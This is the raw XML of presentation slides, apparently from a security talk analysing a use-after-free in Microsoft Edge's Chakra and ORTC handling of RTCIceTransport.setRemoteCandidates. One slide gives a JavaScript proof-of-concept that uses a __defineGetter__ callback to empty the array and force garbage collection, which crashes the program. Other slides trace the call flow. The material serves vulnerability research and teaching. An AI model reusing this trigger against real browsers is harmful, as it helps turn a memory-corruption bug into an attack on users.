              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="SimHei" charset="-122"/>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> Create an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="SimHei" charset="-122"/>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>RTCIceTransport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="SimHei" charset="-122"/>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> object</a:t>
            </a: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endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="SimHei" charset="-122"/>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>setRemoteCandidates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="SimHei" charset="-122"/>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> method accepts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="SimHei" charset="-122"/>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>RTCIceCandidate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="SimHei" charset="-122"/>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> dictionary type structure object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3574065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28" name="矩形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43112830-2342-40E7-A093-AA0E91E70F1E}"/>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52F9F16A-E280-4EE3-A741-2E7A55756E6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2443527"/>
            <a:ext cx="10953455" cy="7791335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="2">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="SimHei" charset="-122"/>
                <a:ea typeface="SimHei" charset="-122"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>// Continued above</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>obj_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>arr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>defineGetter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>__(cnt-1,function()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>{	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>obj_arr.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> = 0;		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>CollectGarbage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>();	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>ice_tran.setRemoteCandidates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>obj_arr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>);			</a:t>
            </a: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a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="SimHei" charset="-122"/>
                <a:ea typeface="SimHei" charset="-122"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> Implement callback function by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="SimHei" charset="-122"/>
                <a:ea typeface="SimHei" charset="-122"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>defineGetter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="SimHei" charset="-122"/>
                <a:ea typeface="SimHei" charset="-122"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="SimHei" charset="-122"/>
                <a:ea typeface="SimHei" charset="-122"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>//Call the callback function when processing the last dynamic object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="SimHei" charset="-122"/>
                <a:ea typeface="SimHei" charset="-122"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> Object array length is 0, Free all dynamic objects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="SimHei" charset="-122"/>
                <a:ea typeface="SimHei" charset="-122"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> Trigger vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64A19FA1-0C22-44AD-AA76-CBE3FE7A02A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="8210777"/>
            <a:ext cx="8459575" cy="748020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E115723-B6AA-4FE2-8C5D-C288463C5598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078127" y="8958797"/>
            <a:ext cx="7490100" cy="895886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3994733E-5C28-433D-869F-6AF9F102BC54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9480754" y="8206530"/>
            <a:ext cx="2607773" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic objects are recycled and cause crashes</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9B62EF7-6046-4239-9E40-7937BB37D986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7103487" y="8764702"/>
            <a:ext cx="2434213" cy="19409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B5767942-D8C3-4725-A7C0-F1545E7BFB00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021178" y="7606054"/>
            <a:ext cx="8723241" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>program crash</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3574873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6" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D48AEB4-C927-4837-9E9A-19DD534D2A27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2550693"/>
            <a:ext cx="5828327" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chakra!ScriptEngineBase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GetScriptType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> call flow</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4F247D5-6210-4D87-9EE0-A43EFE23B2B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1125986" y="3438450"/>
            <a:ext cx="6062214" cy="1496996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBC5F467-A96C-4DD2-A62A-177569967E32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1125986" y="5708222"/>
            <a:ext cx="5871714" cy="1803125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F3BD921-0498-453F-9E96-CB8C802DA79E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074772" y="2931376"/>
            <a:ext cx="5681363" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ORTC::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UnpackSequenceOfDictionaryFromVar</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ECDA8FA-6E7B-49B7-A9B8-12AE66802535}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074773" y="4935446"/>
            <a:ext cx="6621428" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ORTC::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UnpackRTCIceCandidateFromVarToCollection</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
